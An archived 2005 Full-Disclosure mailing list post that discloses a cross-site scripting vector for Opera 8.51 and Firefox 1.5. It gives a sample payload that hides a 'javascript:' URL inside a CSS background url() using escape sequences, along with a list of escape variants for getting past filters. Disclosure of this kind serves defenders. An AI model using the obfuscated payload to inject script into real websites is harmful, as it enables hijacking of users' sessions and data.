lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <920140c20512020815m7a7cb260k6f85b3d55489be42@mail.gmail.com>
Date: Fri Dec  2 16:16:22 2005
From: st4rdust at gmail.com (hoshikuzu stardust)
Subject: Opera/8.51 Firefox/1.5 XSS attacking vector

Hello full-disclosure.

Sample:
<anytag
style="background:url(&quot;javascri\Dpt:/*/**/(function a()
{alert('JavaScript is executed.')})();&quot;);"
/>

Affected Web browsers are `Opera Version 8.51` and `Firefox/1.5`.
( Tested on Windows XP servicepack2. )

Variant:
"\d"
"\D"
"\0d"
"\00000d"
"\d "
"\00000d "
"\a"
"\9"
e.t.c.
(Maybe we must checkout \7 via IE on Mac (a.k.a. BELL on Mac. ),
I do not have Mac.

If your web application does not sanitize output it is very easy to
inject malicious
scripts.

Is it well-known information ? ,sorry.

BEST REGARDS.

--
hoshikuzu | star_dust

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ